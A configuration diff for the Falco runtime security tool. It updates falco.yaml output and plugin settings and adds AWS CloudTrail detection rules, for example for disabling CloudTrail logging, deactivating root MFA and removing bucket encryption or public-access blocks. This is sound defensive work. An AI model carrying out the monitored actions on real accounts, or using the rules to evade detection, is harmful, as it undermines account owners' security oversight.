-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/falco.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,6 +343,447 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
+  aws_cloudtrail_rules.yaml: |+
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require at least engine version 10
+    - required_engine_version: 10
+
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
   falco_rules.local.yaml: |
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -376,7 +817,7 @@
     # Or override/append to any rule, macro, or list from the Default Rules
   falco_rules.yaml: |
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +847,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +881,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1037,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1154,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
@@ -817,6 +1261,9 @@
     - list: shell_config_directories
       items: [/etc/zsh]
 
+    - macro: user_known_shell_config_modifiers
+      condition: (never_true)
+
     - rule: Modify Shell Configuration File
       desc: Detect attempt to modify shell configuration files
       condition: >
@@ -826,6 +1273,7 @@
          fd.directory in (shell_config_directories))
         and not proc.name in (shell_binaries)
         and not exe_running_docker_save
+        and not user_known_shell_config_modifiers
       output: >
         a shell configuration file has been modified (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline pcmdline=%proc.pcmdline file=%fd.name container_id=%container.id image=%container.image.repository)
       priority:
@@ -938,7 +1386,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1597,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1928,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
